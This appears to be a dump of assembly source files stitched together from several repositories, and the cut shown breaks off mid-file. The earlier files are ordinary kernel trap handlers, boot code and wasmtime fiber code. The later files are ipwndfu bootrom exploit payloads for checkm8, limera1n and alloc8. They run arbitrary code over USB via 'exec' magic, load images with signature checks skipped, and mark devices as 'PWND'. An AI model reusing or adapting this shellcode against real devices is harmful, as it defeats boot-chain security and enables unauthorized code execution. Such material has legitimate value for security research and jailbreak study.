j .Ltrap_entry_s
.Ltrap_entry_s:
SAVE_REGS 0
mv a0, sp
li a1, 0
call riscv_trap_handler
RESTORE_REGS 0
sret
.Ltrap_entry_u:
SAVE_REGS 1
mv a0, sp
li a1, 1
call riscv_trap_handler
RESTORE_REGS 1
sret
|
MukioXun/OSKernel_test | 1,397 | AstrancE/modules/axhal/src/arch/x86_64/syscall.S | .section .text
.code64
syscall_entry:
swapgs // switch to kernel gs
mov gs:[offset __PERCPU_USER_RSP_OFFSET], rsp // save user rsp
mov rsp, gs:[offset __PERCPU_TSS + {tss_rsp0_offset}] // switch to kernel stack
sub rsp, 8 // skip user ss
push gs:[offset __PERCPU_USER_RSP_OFFSET] // user rsp
push r11 // rflags
push {ucode64} // cs
push rcx // rip
sub rsp, 4 * 8 // skip until general registers
push r15
push r14
push r13
push r12
push r11
push r10
push r9
push r8
push rdi
push rsi
push rbp
push rbx
push rdx
push rcx
push rax
mov rdi, rsp
call x86_syscall_handler
pop rax
pop rcx
pop rdx
pop rbx
pop rbp
pop rsi
pop rdi
pop r8
pop r9
pop r10
pop r11
pop r12
pop r13
pop r14
pop r15
add rsp, 9 * 8
mov rcx, [rsp - 5 * 8] // rip
mov r11, [rsp - 3 * 8] // rflags
mov rsp, [rsp - 2 * 8] // user rsp
swapgs
sysretq
|
MukioXun/OSKernel_test | 1,627 | AstrancE/modules/axhal/src/arch/x86_64/trap.S | .equ NUM_INT, 256
.altmacro
.macro DEF_HANDLER, i
.Ltrap_handler_\i:
.if \i == 8 || (\i >= 10 && \i <= 14) || \i == 17
# error code pushed by CPU
push \i # interrupt vector
jmp .Ltrap_common
.else
push 0 # fill in error code in TrapFrame
push \i # interrupt vector
jmp .Ltrap_common
.endif
.endm
.macro DEF_TABLE_ENTRY, i
.quad .Ltrap_handler_\i
.endm
.section .text
.code64
_trap_handlers:
.set i, 0
.rept NUM_INT
DEF_HANDLER %i
.set i, i + 1
.endr
.Ltrap_common:
test byte ptr [rsp + 3 * 8], 3 # swap GS if it comes from user space
jz 1f
swapgs
1:
sub rsp, 16 # reserve space for fs_base
push r15
push r14
push r13
push r12
push r11
push r10
push r9
push r8
push rdi
push rsi
push rbp
push rbx
push rdx
push rcx
push rax
mov rdi, rsp
call x86_trap_handler
pop rax
pop rcx
pop rdx
pop rbx
pop rbp
pop rsi
pop rdi
pop r8
pop r9
pop r10
pop r11
pop r12
pop r13
pop r14
pop r15
add rsp, 16 # pop fs_base
test byte ptr [rsp + 3 * 8], 3 # swap GS back if return to user space
jz 2f
swapgs
2:
add rsp, 16 # pop vector, error_code
iretq
.section .rodata
.global trap_handler_table
trap_handler_table:
.set i, 0
.rept NUM_INT
DEF_TABLE_ENTRY %i
.set i, i + 1
.endr
|
MukioXun/OSKernel_test | 2,989 | AstrancE/modules/axhal/src/arch/aarch64/trap.S | .macro SAVE_REGS
sub sp, sp, {trapframe_size}
stp x0, x1, [sp]
stp x2, x3, [sp, 2 * 8]
stp x4, x5, [sp, 4 * 8]
stp x6, x7, [sp, 6 * 8]
stp x8, x9, [sp, 8 * 8]
stp x10, x11, [sp, 10 * 8]
stp x12, x13, [sp, 12 * 8]
stp x14, x15, [sp, 14 * 8]
stp x16, x17, [sp, 16 * 8]
stp x18, x19, [sp, 18 * 8]
stp x20, x21, [sp, 20 * 8]
stp x22, x23, [sp, 22 * 8]
stp x24, x25, [sp, 24 * 8]
stp x26, x27, [sp, 26 * 8]
stp x28, x29, [sp, 28 * 8]
str x30, [sp, 30 * 8]
mrs x9, sp_el0
mrs x10, tpidr_el0
mrs x11, elr_el1
mrs x12, spsr_el1
stp x9, x10, [sp, 31 * 8]
stp x11, x12, [sp, 33 * 8]
# restore kernel tpidr_el0
mrs x1, tpidrro_el0
msr tpidr_el0, x1
# We may have interrupted userspace, or a guest, or exit-from or
# return-to either of those. So we can't trust sp_el0, and need to
# restore it.
bl {cache_current_task_ptr}
.endm
.macro RESTORE_REGS
# backup kernel tpidr_el0
mrs x1, tpidr_el0
msr tpidrro_el0, x1
ldp x11, x12, [sp, 33 * 8]
ldp x9, x10, [sp, 31 * 8]
msr sp_el0, x9
msr tpidr_el0, x10
msr elr_el1, x11
msr spsr_el1, x12
ldr x30, [sp, 30 * 8]
ldp x28, x29, [sp, 28 * 8]
ldp x26, x27, [sp, 26 * 8]
ldp x24, x25, [sp, 24 * 8]
ldp x22, x23, [sp, 22 * 8]
ldp x20, x21, [sp, 20 * 8]
ldp x18, x19, [sp, 18 * 8]
ldp x16, x17, [sp, 16 * 8]
ldp x14, x15, [sp, 14 * 8]
ldp x12, x13, [sp, 12 * 8]
ldp x10, x11, [sp, 10 * 8]
ldp x8, x9, [sp, 8 * 8]
ldp x6, x7, [sp, 6 * 8]
ldp x4, x5, [sp, 4 * 8]
ldp x2, x3, [sp, 2 * 8]
ldp x0, x1, [sp]
add sp, sp, {trapframe_size}
.endm
.macro INVALID_EXCP, kind, source
.p2align 7
SAVE_REGS
mov x0, sp
mov x1, \kind
mov x2, \source
bl invalid_exception
b .Lexception_return
.endm
.macro HANDLE_SYNC, source
.p2align 7
SAVE_REGS
mov x0, sp
mov x1, \source
bl handle_sync_exception
b .Lexception_return
.endm
.macro HANDLE_IRQ, source
.p2align 7
SAVE_REGS
mov x0, sp
mov x1, \source
bl handle_irq_exception
b .Lexception_return
.endm
.section .text
.p2align 11
.global exception_vector_base
exception_vector_base:
// current EL, with SP_EL0
INVALID_EXCP 0 0
INVALID_EXCP 1 0
INVALID_EXCP 2 0
INVALID_EXCP 3 0
// current EL, with SP_ELx
HANDLE_SYNC 1
HANDLE_IRQ 1
INVALID_EXCP 2 1
INVALID_EXCP 3 1
// lower EL, aarch64
HANDLE_SYNC 2
HANDLE_IRQ 2
INVALID_EXCP 2 2
INVALID_EXCP 3 2
// lower EL, aarch32
INVALID_EXCP 0 3
INVALID_EXCP 1 3
INVALID_EXCP 2 3
INVALID_EXCP 3 3
.Lexception_return:
RESTORE_REGS
eret
|
MusicalArtist12/basic-os-rust | 2,287 | src/kernel/boot/init.s | .global start
.section .init, "ax", @progbits
.code32
.extern stack_top
start:
cli
mov %ebx, %edi // pass multiboot address information to _start
movl $stack_top, %esp
call check_multiboot
call check_cpuid
call check_longmode
call setup_page_tables
call enable_paging
lgdt (gdt64_pointer)
movw $gdt64_data_offset, %ax
movw %ax, %ds
movw %ax, %es
movw %ax, %fs
movw %ax, %gs
movw %ax, %ss
ljmp $gdt64_code_offset, $fix_cs
fix_cs:
jmp _start
hlt
check_multiboot:
cmp $0x36d76289, %eax
jne multiboot_fail
ret
check_cpuid:
pushfd
pop %eax
// make a copy and store into %ecx
mov %eax, %ecx
xor $1 << 21, %eax
push %eax
popfd
pushfd
pop %eax
push %ecx
popfd
xor %eax, %ecx
jz cpuid_fail // jump if eax == ecx
ret
check_longmode:
mov 0x80000000, %eax
cpuid
cmp 0x80000001, %eax
jb longmode_fail // jump if eax < ecx
ret
setup_page_tables:
movl $p3_table, %eax
or $0b11, %eax
movl %eax, (p4_table)
movl $p2_table, %eax
or $0b11, %eax
movl %eax, (p3_table)
movl $0, %ecx
.map_p2_table:
movl $0x200000, %eax
mul %ecx
orl $0b10000011, %eax
movl %eax, p2_table(,%ecx, 8)
inc %ecx
cmp $512, %ecx
jne .map_p2_table
movl $p4_table, %eax
or $0b11, %eax
// movl %eax, p4_table + 511 * 8
movl %eax, [p4_table + 511 * 8]
ret
enable_paging:
movl $p4_table, %eax
movl %eax, %cr3
movl %cr4, %eax
orl $1 << 5, %eax
mov %eax, %cr4
mov $0xC0000080, %ecx
rdmsr
orl $1 << 8, %eax
wrmsr
movl %cr0, %eax
orl $1 << 31, %eax
mov %eax, %cr0
ret
.equ vga_start, 0xb8000
cpuid_fail:
movl $0x4f504f43, vga_start
movl $0x4f494f55, vga_start + 4
movl $0x00004f44, vga_start + 8
hlt
longmode_fail:
movl $0x4f4f4f4c, vga_start
movl $0x4f474f4e, vga_start + 4
movl $0x4f444f4d, vga_start + 8
hlt
multiboot_fail:
movl $0x4f554f4d, vga_start
movl $0x4f544f4c, vga_start + 4
movl $0x4f424f49, vga_start + 8
movl $0x4f4f4f4f, vga_start + 12
movl $0x4f0a4f54, vga_start + 16
hlt
|
Mwneees/New | 4,165 | crates/fiber/src/unix/s390x.S | // A WORD OF CAUTION
//
// This entire file basically needs to be kept in sync with itself. It's not
// really possible to modify just one bit of this file without understanding
// all the other bits. Documentation tries to reference various bits here and
// there but try to make sure to read over everything before tweaking things!
//
// Also at this time this file is heavily based off the x86_64 file, so you'll
// probably want to read that one as well.
.text
#define CONCAT2(a, b) a ## b
#define CONCAT(a, b) CONCAT2(a , b)
#define VERSIONED_SYMBOL(a) CONCAT(a, VERSIONED_SUFFIX)
#define GLOBL(fnname) .globl VERSIONED_SYMBOL(fnname)
#define HIDDEN(fnname) .hidden VERSIONED_SYMBOL(fnname)
#define TYPE(fnname) .type VERSIONED_SYMBOL(fnname),@function
#define FUNCTION(fnname) VERSIONED_SYMBOL(fnname)
#define SIZE(fnname) .size VERSIONED_SYMBOL(fnname),.-VERSIONED_SYMBOL(fnname)
// fn(top_of_stack(%x0): *mut u8)
HIDDEN(wasmtime_fiber_switch)
GLOBL(wasmtime_fiber_switch)
.p2align 2
TYPE(wasmtime_fiber_switch)
FUNCTION(wasmtime_fiber_switch):
// Save all callee-saved registers on the stack since we're assuming
// they're clobbered as a result of the stack switch.
stmg %r6, %r15, 48(%r15)
aghi %r15, -64
std %f8, 0(%r15)
std %f9, 8(%r15)
std %f10, 16(%r15)
std %f11, 24(%r15)
std %f12, 32(%r15)
std %f13, 40(%r15)
std %f14, 48(%r15)
std %f15, 56(%r15)
// Load our previously saved stack pointer to resume to, and save off our
// current stack pointer on where to come back to eventually.
lg %r1, -16(%r2)
stg %r15, -16(%r2)
// Switch to the new stack and restore all our callee-saved registers after
// the switch and return to our new stack.
ld %f8, 0(%r1)
ld %f9, 8(%r1)
ld %f10, 16(%r1)
ld %f11, 24(%r1)
ld %f12, 32(%r1)
ld %f13, 40(%r1)
ld %f14, 48(%r1)
ld %f15, 56(%r1)
lmg %r6, %r15, 112(%r1)
br %r14
SIZE(wasmtime_fiber_switch)
// fn(
// top_of_stack(%x0): *mut u8,
// entry_point(%x1): extern fn(*mut u8, *mut u8),
// entry_arg0(%x2): *mut u8,
// )
HIDDEN(wasmtime_fiber_init)
GLOBL(wasmtime_fiber_init)
.p2align 2
TYPE(wasmtime_fiber_init)
FUNCTION(wasmtime_fiber_init):
larl %r1, FUNCTION(wasmtime_fiber_start)
stg %r1, -48(%r2) // wasmtime_fiber_start - restored into %r14
stg %r2, -112(%r2) // top_of_stack - restored into %r6
stg %r3, -104(%r2) // entry_point - restored into %r7
stg %r4, -96(%r2) // entry_arg0 - restored into %r8
aghi %r2, -160 // 160 bytes register save area
stg %r2, 120(%r2) // bottom of register save area - restored into %r15
// `wasmtime_fiber_switch` has a 64 byte stack.
aghi %r2, -64
stg %r2, 208(%r2)
br %r14
SIZE(wasmtime_fiber_init)
.p2align 2
TYPE(wasmtime_fiber_start)
FUNCTION(wasmtime_fiber_start):
.cfi_startproc simple
.cfi_def_cfa_offset 0
// See the x86_64 file for more commentary on what these CFI directives are
// doing. Like over there note that the relative offsets to registers here
// match the frame layout in `wasmtime_fiber_switch`.
.cfi_escape 0x0f, /* DW_CFA_def_cfa_expression */ \
7, /* the byte length of this expression */ \
0x7f, 0x90, 0x1, /* DW_OP_breg15 0x90 */ \
0x06, /* DW_OP_deref */ \
0x23, 0xe0, 0x1 /* DW_OP_plus_uconst 0xe0 */
.cfi_rel_offset 6, -112
.cfi_rel_offset 7, -104
.cfi_rel_offset 8, -96
.cfi_rel_offset 9, -88
.cfi_rel_offset 10, -80
.cfi_rel_offset 11, -72
.cfi_rel_offset 12, -64
.cfi_rel_offset 13, -56
.cfi_rel_offset 14, -48
.cfi_rel_offset 15, -40
// Load our two arguments prepared by `wasmtime_fiber_init`.
lgr %r2, %r8 // entry_arg0
lgr %r3, %r6 // top_of_stack
// ... and then we call the function! Note that this is a function call so
// our frame stays on the stack to backtrace through.
basr %r14, %r7 // entry_point
// .. technically we shouldn't get here, so just trap.
.word 0x0000
.cfi_endproc
SIZE(wasmtime_fiber_start)
// Mark that we don't need executable stack.
.section .note.GNU-stack,"",%progbits
|
Mwneees/New | 4,052 | crates/wasmtime/src/runtime/vm/arch/s390x.S | // Currently `global_asm!` isn't stable on s390x, so this is an external
// assembler file built with the `build.rs`.
.machine z13
.text
.hidden host_to_wasm_trampoline
.globl host_to_wasm_trampoline
.type host_to_wasm_trampoline,@function
.p2align 2
#define CONCAT2(a, b) a ## b
#define CONCAT(a, b) CONCAT2(a , b)
#define VERSIONED_SYMBOL(a) CONCAT(a, VERSIONED_SUFFIX)
#define LIBCALL_TRAMPOLINE(libcall, libcall_impl) \
.hidden VERSIONED_SYMBOL(libcall) ; \
.globl VERSIONED_SYMBOL(libcall) ; \
.type VERSIONED_SYMBOL(libcall),@function ; \
.p2align 2 ; \
VERSIONED_SYMBOL(libcall): ; \
.cfi_startproc ; \
\
/* Load the pointer to `VMRuntimeLimits` in `%r1`. */ \
lg %r1, 8(%r2) ; \
\
/* Store the last Wasm FP into the `last_wasm_exit_fp` in the limits. */ \
lg %r0, 0(%r15) ; \
stg %r0, 24(%r1) ; \
\
/* Store the last Wasm PC into the `last_wasm_exit_pc` in the limits. */ \
stg %r14, 32(%r1) ; \
\
/* Tail call to the actual implementation of this libcall. */ \
jg VERSIONED_SYMBOL(libcall_impl) ; \
\
.cfi_endproc ; \
.size VERSIONED_SYMBOL(libcall),.-VERSIONED_SYMBOL(libcall)
LIBCALL_TRAMPOLINE(memory32_grow, impl_memory32_grow)
LIBCALL_TRAMPOLINE(table_grow_func_ref, impl_table_grow_func_ref)
LIBCALL_TRAMPOLINE(table_grow_externref, impl_table_grow_externref)
LIBCALL_TRAMPOLINE(table_fill_func_ref, impl_table_fill_func_ref)
LIBCALL_TRAMPOLINE(table_fill_externref, impl_table_fill_externref)
LIBCALL_TRAMPOLINE(table_copy, impl_table_copy)
LIBCALL_TRAMPOLINE(table_init, impl_table_init)
LIBCALL_TRAMPOLINE(elem_drop, impl_elem_drop)
LIBCALL_TRAMPOLINE(memory_copy, impl_memory_copy)
LIBCALL_TRAMPOLINE(memory_fill, impl_memory_fill)
LIBCALL_TRAMPOLINE(memory_init, impl_memory_init)
LIBCALL_TRAMPOLINE(ref_func, impl_ref_func)
LIBCALL_TRAMPOLINE(data_drop, impl_data_drop)
LIBCALL_TRAMPOLINE(table_get_lazy_init_func_ref, impl_table_get_lazy_init_func_ref)
LIBCALL_TRAMPOLINE(drop_gc_ref, impl_drop_gc_ref)
LIBCALL_TRAMPOLINE(gc, gc)
LIBCALL_TRAMPOLINE(gc_ref_global_get, impl_gc_ref_global_get)
LIBCALL_TRAMPOLINE(gc_ref_global_set, impl_gc_ref_global_set)
LIBCALL_TRAMPOLINE(memory_atomic_notify, impl_memory_atomic_notify)
LIBCALL_TRAMPOLINE(memory_atomic_wait32, impl_memory_atomic_wait32)
LIBCALL_TRAMPOLINE(memory_atomic_wait64, impl_memory_atomic_wait64)
LIBCALL_TRAMPOLINE(out_of_gas, impl_out_of_gas)
LIBCALL_TRAMPOLINE(new_epoch, impl_new_epoch)
LIBCALL_TRAMPOLINE(check_malloc, impl_check_malloc)
LIBCALL_TRAMPOLINE(check_free, impl_check_free)
LIBCALL_TRAMPOLINE(check_load, impl_check_load)
LIBCALL_TRAMPOLINE(check_store, impl_check_store)
LIBCALL_TRAMPOLINE(malloc_start, impl_malloc_start)
LIBCALL_TRAMPOLINE(free_start, impl_free_start)
LIBCALL_TRAMPOLINE(update_stack_pointer, impl_update_stack_pointer)
LIBCALL_TRAMPOLINE(update_mem_size, impl_update_mem_size)
|
n1z19/ipwndfu | 2,237 | src/checkm8_armv7.S | .text
.pool
.set PAYLOAD_OFFSET, 0xBAD00006
.set PAYLOAD_SIZE, 0xBAD00007
.set PAYLOAD_DEST, 0xBAD00005
.set PAYLOAD_PTR, 0xBAD00008
.set gUSBSerialNumber, 0xBAD00002
.set gUSBSRNMStringDescriptor, 0xBAD00004
.set gUSBDescriptors, 0xBAD00001
.set usb_create_string_descriptor, 0xBAD00003
.code 32
.global _main
_main:
MOV R4, #0 // HACK: do not free this usb request
PUSH {R4-R7,LR}
LDR R0, =gUSBDescriptors
LDRD R0, R1, [R0]
ADR R2, USB_DESCRIPTOR
LDRD R4, R5, [R2]
STRD R4, R5, [R0]
STRD R4, R5, [R1]
LDRD R4, R5, [R2,#0x8]
STRD R4, R5, [R0,#0x8]
STRD R4, R5, [R1,#0x8]
LDRD R4, R5, [R2,#0x10]
STRD R4, R5, [R0,#0x10]
STRD R4, R5, [R1,#0x10]
LDRD R4, R5, [R2,#0x18]
STRD R4, R5, [R0,#0x18]
STRD R4, R5, [R1,#0x18]
LDR R0, =gUSBSerialNumber
find_zero_loop:
ADD R0, R0, #1
LDRB R1, [R0]
CMP R1, #0
BNE find_zero_loop
ADR R1, PWND_STRING
LDR R2, [R1]
LDR R3, [R1,#0x4]
STR R2, [R0]
STR R3, [R0,#0x4]
LDR R2, [R1,#0x8]
LDR R3, [R1,#0xC]
STR R2, [R0,#0x8]
STR R3, [R0,#0xC]
LDR R0, =gUSBSerialNumber
LDR R1, =usb_create_string_descriptor
LDR R4, =gUSBSRNMStringDescriptor
BLX R1
STRB R0, [R4]
LDR R0, =PAYLOAD_DEST
ADR R1, _main
LDR R2, =PAYLOAD_OFFSET
ADD R1, R1, R2
MOV R2, #0
LDR R3, =PAYLOAD_SIZE
LDR R4, =PAYLOAD_PTR
ADD R5, R0, #0x9
STR R5, [R4]
copy_loop:
LDRD R4, R5, [R1]
STRD R4, R5, [R0]
LDRD R4, R5, [R1,#0x8]
STRD R4, R5, [R0,#0x8]
LDRD R4, R5, [R1,#0x10]
STRD R4, R5, [R0,#0x10]
LDRD R4, R5, [R1,#0x18]
STRD R4, R5, [R0,#0x18]
LDRD R4, R5, [R1,#0x20]
STRD R4, R5, [R0,#0x20]
LDRD R4, R5, [R1,#0x28]
STRD R4, R5, [R0,#0x28]
LDRD R4, R5, [R1,#0x30]
STRD R4, R5, [R0,#0x30]
LDRD R4, R5, [R1,#0x38]
STRD R4, R5, [R0,#0x38]
MCR p15, 0, R0,c7,c14, 1
DMB SY
ADD R0, R0, #0x40
ADD R1, R1, #0x40
ADD R2, R2, #0x40
CMP R2, R3
BCC copy_loop
MOV R0, #0
MCR p15, 0, R0, c7, c5, 0
DSB
ISB
POP {R4-R7,PC}
USB_DESCRIPTOR:
.word 0x190209, 0x80050101, 0x409fa, 0x1fe0000, 0x21070000, 0xa01, 0x8, 0x0
PWND_STRING:
.asciz " PWND:[checkm8]"
|
n1z19/ipwndfu | 7,690 | src/limera1n-shellcode.S | @ limera1n-shellcode.S
@ Author: axi0mX
@ Shellcode for limera1n exploit with minor improvements:
@ * supports 'exec' magic for code execution over USB
@ * reports PWND:[limera1n] in USB serial number string
.text
.pool
.set free, 0xBAD0000d
.set memz_create, 0xBAD0000f
.set memz_destroy, 0xBAD00011
.set image3_create_struct, 0xBAD00014
.set image3_load_continue, 0xBAD00015
.set image3_load_fail, 0xBAD00016
.set usb_wait_for_image, 0xBAD00009
.set jump_to, 0xBAD00010
.set nor_power_on, 0xBAD00005
.set nor_init, 0xBAD00006
.set memmove, 0xBAD00003
.set strlcat, 0xBAD00008
.set gLeakingDFUBuffer, 0xBAD0000c
.set gUSBSerialNumber, 0xBAD00007
.set RELOCATE_SHELLCODE_ADDRESS, 0xBAD00001
.set RELOCATE_SHELLCODE_SIZE, 0xBAD00002
.set MAIN_STACK_ADDRESS, 0xBAD00004
.set LOAD_ADDRESS, 0xBAD0000a
.set MAX_SIZE, 0xBAD0000b
.set EXEC_MAGIC, 0xBAD0000e
.set IMAGE3_LOAD_SP_OFFSET, 0xBAD00012
.set IMAGE3_LOAD_STRUCT_OFFSET, 0xBAD00013
.global _start
_start:
.code 16
B relocate_shellcode @ goto relocate_shellcode
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
NOP
relocate_shellcode:
MOV R1, PC
SUB R1, R1, #4 @ R1 = PC - 4
LDR R0, =RELOCATE_SHELLCODE_ADDRESS
CMP R0, R1
BEQ pwned_dfu_start @ if (R1 == RELOCATE_SHELLCODE_ADDRESS) goto pwned_dfu_start
LDR R2, =RELOCATE_SHELLCODE_SIZE
LDR R3, =memmove
BLX R3 @ memmove(RELOCATE_SHELLCODE_ADDRESS, R1, RELOCATE_SHELLCODE_SIZE)
LDR R3, =RELOCATE_SHELLCODE_ADDRESS
ADD R3, R3, #1
BX R3 @ goto (RELOCATE_SHELLCODE_ADDRESS + 1)
pwned_dfu_start:
LDR R0, =MAIN_STACK_ADDRESS
MOV SP, R0 @ SP = MAIN_STACK_ADDRESS
MOV R0, #1
MOV R1, #1
MOV R2, #0
LDR R3, =nor_power_on
BLX R3 @ nor_power_on(1, 1, 0)
MOV R0, #0
LDR R3, =nor_init
BLX R3 @ nor_init(0)
LDR R0, =gUSBSerialNumber
ADR R1, PWND_STRING
MOV R2, #120
LDR R3, =strlcat
BLX R3 @ strlcat(gUSBSerialNumber, PWND_STRING, 120)
pwned_dfu_loop:
LDR R3, =usb_wait_for_image
LDR R0, =LOAD_ADDRESS
LDR R1, =MAX_SIZE
BLX R3 @ R0 = usb_wait_for_image(LOAD_ADDRESS, MAX_SIZE)
MOV R4, R0 @ R4 = R0
LDR R1, =gLeakingDFUBuffer
LDR R0, [R1] @ R0 = gLeakingDFUBuffer
MOV R2, #0
STR R2, [R1] @ gLeakingDFUBuffer = 0
LDR R3, =free
BLX R3 @ free(R0)
CMP R4, #0
BLT pwned_dfu_loop @ if (R4 < 0) goto pwned_dfu_loop
LDR R5, =LOAD_ADDRESS
LDR R0, [R5] @ R0 = LOAD_ADDRESS[0]
LDR R1, =EXEC_MAGIC
CMP R0, R1
BNE pwned_dfu_not_exec_magic @ if (R0 != EXEC_MAGIC) goto pwned_dfu_not_exec_magic
LDR R0, [R5, #0x8] @ R0 = LOAD_ADDRESS[2] /* arg1 */
LDR R1, [R5, #0xC] @ R1 = LOAD_ADDRESS[3] /* arg2 */
LDR R2, [R5, #0x10] @ R2 = LOAD_ADDRESS[4] /* arg3 */
LDR R3, [R5, #0x14] @ R3 = LOAD_ADDRESS[5] /* arg4 */
LDR R4, [R5, #0x18]
STR R4, [SP] @ SP[0] = LOAD_ADDRESS[6] /* arg5 */
LDR R4, [R5, #0x1C]
STR R4, [SP, #0x4] @ SP[1] = LOAD_ADDRESS[7] /* arg6 */
LDR R4, [R5, #0x20]
STR R4, [SP, #0x8] @ SP[2] = LOAD_ADDRESS[8] /* arg7 */
LDR R4, [R5, #0x4]
BLX R4 @ R0 = LOAD_ADDRESS[1](R0, R1, R2, R3, SP[0], SP[1], SP[2])
STR R0, [R5, #4] @ LOAD_ADDRESS[1] = R0
MOV R1, #0
STR R1, [R5] @ LOAD_ADDRESS[0] = 0
B pwned_dfu_loop @ goto pwned_dfu_loop
pwned_dfu_not_exec_magic:
LDR R0, =LOAD_ADDRESS
MOV R1, R4
MOV R2, #0
LDR R3, =memz_create
BLX R3 @ R0 = memz_create(LOAD_ADDRESS, R4, 0)
CMP R0, #0
BEQ pwned_dfu_loop @ if (R0 == 0) goto pwned_dfu_loop /* out of memory :-| */
LDR R3, =LOAD_ADDRESS
STR R3, [SP] @ SP[0] = LOAD_ADDRESS
STR R4, [SP, #4] @ SP[1] = R4
MOV R4, R0 @ R4 = R0
MOV R1, SP
ADD R2, SP, #4
BL image3_load_no_signature_check @ R0 = image3_load_no_signature_check(R0, &SP[0], &SP[1])
CBNZ R0, load_failed @ if (R0 != 0) goto load_failed
LDR R1, =LOAD_ADDRESS
MOV R2, #0
LDR R3, =jump_to
BLX R3 @ jump_to(0, LOAD_ADDRESS, 0)
/* jump_to should never return */
load_failed:
MOV R0, R4
LDR R3, =memz_destroy
BLX R3 @ memz_destroy(R4)
B pwned_dfu_loop @ goto pwned_dfu_loop
image3_load_no_signature_check:
PUSH {R4-R7, LR} @ push_registers(R4, R5, R6, R7, LR)
MOV R6, R11
MOV R5, R10
MOV R4, R8
PUSH {R4-R6} @ push_registers(R8, R10, R11)
ADD R7, SP, #0x18 @ R7 = SP - 0x18
LDR R4, =IMAGE3_LOAD_SP_OFFSET
MOV R5, SP
SUB R5, R5, R4
MOV SP, R5 @ SP = SP - IMAGE3_LOAD_SP_OFFSET
MOV R3, #0
LDR R4, =IMAGE3_LOAD_STRUCT_OFFSET
ADD R4, R5, R4
STR R3, [R4] @ *(SP + IMAGE3_LOAD_STRUCT_OFFSET) = 0
STR R2, [SP, #0x10] @ SP[4] = R2
STR R1, [SP, #0x14] @ SP[5] = R1
STR R3, [SP, #0x18] @ SP[6] = 0
LDR R6, [R1] @ R6 = *R1
MOV R10, R1 @ R10 = R1
MOV R11, R3 @ R11 = 0
LDR R1, =MAX_SIZE
MOV R8, R1 @ R8 = MAX_SIZE
LDR R2, [R0, #4]
CMP R2, R1
BGT img3_fail @ if (R0[1] > MAX_SIZE) goto img3_fail
MOV R8, R2 @ R8 = R0[1]
MOV R0, R4
MOV R1, R6
LDR R4, =image3_create_struct
BLX R4
MOV R4, R0 @ R4 = image3_create_struct(SP + IMAGE3_LOAD_STRUCT_OFFSET, R6, R8, 0)
LDR R3, =image3_load_continue @ R3 = image3_load_continue
CBZ R4, img3_branch_R3 @ if (R4 == 0) goto img3_branch_R3
img3_fail:
MOV R4, #1 @ R4 = 1
LDR R3, =image3_load_fail @ R3 = image3_load_fail
img3_branch_R3:
BX R3 @ goto R3
.align 2
PWND_STRING:
.ascii " PWND:[limera1n]\x00"
|
n1z19/ipwndfu | 8,764 | src/alloc8-shellcode.S | @ alloc8-shellcode.S
@ Author: axi0mX
@ Shellcode for alloc8 exploit with minor improvements:
@ * supports 'exec' magic for code execution over USB
@ * reports PWND:[alloc8] in USB serial number string
@ * enters pwned DFU on boot if home and power buttons are being held and cable is connected
.text
.pool
.set free, 0xBAD00004
.set get_nor_image, 0xBAD0000a
.set memz_create, 0xBAD00013
.set memz_destroy, 0xBAD00014
.set image3_create_struct, 0xBAD00017
.set image3_load_continue, 0xBAD00018
.set image3_load_fail, 0xBAD00019
.set usb_wait_for_image, 0xBAD00010
.set usb_create_serial_number_string, 0xBAD0000e
.set jump_to, 0xBAD0000d
.set exit_critical_section, 0xBAD00005
.set cable_connected, 0xBAD00008
.set power_button_pressed, 0xBAD00007
.set home_button_pressed, 0xBAD00006
.set clean_invalidate_data_cache, 0xBAD00002
.set strlcat, 0xBAD0000f
.set gNorImg3List, 0xBAD00003
.set gLeakingDFUBuffer, 0xBAD00011
.set MAIN_STACK_ADDRESS, 0xBAD00001
.set LOAD_ADDRESS, 0xBAD0000b
.set MAX_SIZE, 0xBAD0000c
.set ILLB_MAGIC, 0xBAD00009
.set MEMZ_STRUCT_MAGIC, 0xBAD00016
.set IMG3_STRUCT_MAGIC, 0xBAD00015
.set EXEC_MAGIC, 0xBAD00012
.global _start
_start:
.code 16
LDR R0, =MAIN_STACK_ADDRESS
MOV SP, R0 @ SP = MAIN_STACK_ADDRESS
LDR R0, =clean_invalidate_data_cache
BLX R0 @ clean_invalidate_data_cache()
LDR R4, =gNorImg3List @ R4 = &gNorImg3List
LDR R1, [R4, #4] @ R1 = R4[1]
LDR R5, [R1, #4] @ R5 = R1[1]
STR R4, [R1, #4] @ R1[1] = R4
STR R1, [R4] @ gNorImg3List = R1
LDR R6, =free @ R6 = free
free_loop:
CMP R4, R5
BEQ pwned_boot @ if (R4 == R5) goto pwned_boot
MOV R0, R5 @ R0 = R5
LDR R5, [R5, #4] @ R5 = R5[1]
BLX R6 @ free(R0)
B free_loop @ goto free_loop
pwned_boot:
SUB SP, SP, #0xC @ SP -= 0xC
LDR R3, =exit_critical_section
BLX R3 @ exit_critical_section()
LDR R3, =home_button_pressed
BLX R3 @ R0 = home_button_pressed()
CBZ R0, pwned_llb_boot @ if (R0 == 0) goto pwned_llb_boot
LDR R3, =power_button_pressed
BLX R3 @ R0 = power_button_pressed()
CBZ R0, pwned_llb_boot @ if (R0 == 0) goto pwned_llb_boot
LDR R3, =cable_connected
BLX R3 @ R0 = cable_connected()
CBNZ R0, pwned_dfu @ if (R0 != 0) goto pwned_dfu
pwned_llb_boot:
LDR R0, =ILLB_MAGIC
LDR R3, =get_nor_image
BLX R3 @ R0 = get_nor_image(ILLB_MAGIC)
CBZ R0, pwned_dfu @ if (R0 == 0) goto pwned_dfu
LDR R1, =LOAD_ADDRESS
STR R1, [SP] @ SP[0] = LOAD_ADDRESS
LDR R1, =MAX_SIZE
STR R1, [SP, #4] @ SP[1] = MAX_SIZE
MOV R1, SP
ADD R2, SP, #4
BL image3_load_no_signature_check @ R0 = image3_load_no_signature_check(R0, &SP[0], &SP[1])
CBNZ R0, pwned_dfu @ if (R0 != 0) goto pwned_dfu
LDR R1, =LOAD_ADDRESS
MOV R2, #0
LDR R3, =jump_to
BLX R3 @ jump_to(0, LOAD_ADDRESS, 0)
/* jump_to should never return */
pwned_dfu:
MOV R0, #1
LDR R3, =usb_create_serial_number_string
BLX R3 @ R0 = usb_create_serial_number_string(1)
ADR R1, PWND_STRING
MOV R2, #120
LDR R3, =strlcat
BLX R3 @ strlcat(R0, PWND_STRING, 120)
pwned_dfu_loop:
LDR R0, =LOAD_ADDRESS
LDR R1, =MAX_SIZE
LDR R3, =usb_wait_for_image
BLX R3
MOV R4, R0 @ R4 = usb_wait_for_image(LOAD_ADDRESS, MAX_SIZE)
LDR R5, =gLeakingDFUBuffer
LDR R0, [R5]
LDR R3, =free
